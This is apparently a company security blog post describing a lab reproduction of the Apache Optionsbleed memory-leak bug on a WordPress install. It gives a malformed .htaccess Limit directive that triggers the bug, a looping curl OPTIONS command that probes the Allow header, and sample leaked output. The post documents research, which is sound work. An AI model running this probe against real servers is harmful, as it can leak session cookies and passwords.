During the weekend our CTO Jonas Lejon has been doing some research into the most recent Apache vulnerability named Optionsbleed. The Optionsbleed vulnerability is a bug in the Apache webserver and makes it possible for an attacker to read remote webserver memory such as session cookies, password etc. The Apache is a very common webserver according to w3techs: Apache is used by 48.9% of all the websites whose web server we know In our lab we set up a Apache webserver, installed WordPress and added the following line to .htaccess: <Limit GET POST PUT REQUEST WPSCANS MPUT OKASDOAKSDOKASDIJ 12U1UH2OIEJ12OPEJOI IDJAIOSDJIOjd> Allow from all </Limit> The above lines would probably trigger the vulnerability since the Limit-line contains some spelling errors. With the following command line I was monitoring the Allow-header output to see if it returned something odd: while true; do curl -sI -X OPTIONS http://hostname.dev/readme.html|grep "Allow:";sleep 0.1; done Then I started to do different Admin-related tasks such as login, logout and uploading. And sometimes I would se different data showing up in the curl-request such as: Allow: GET,HEAD,POST,,sync-upload.php HTTP/1.1,HEAD,OPTIONS,,HEAD
Share This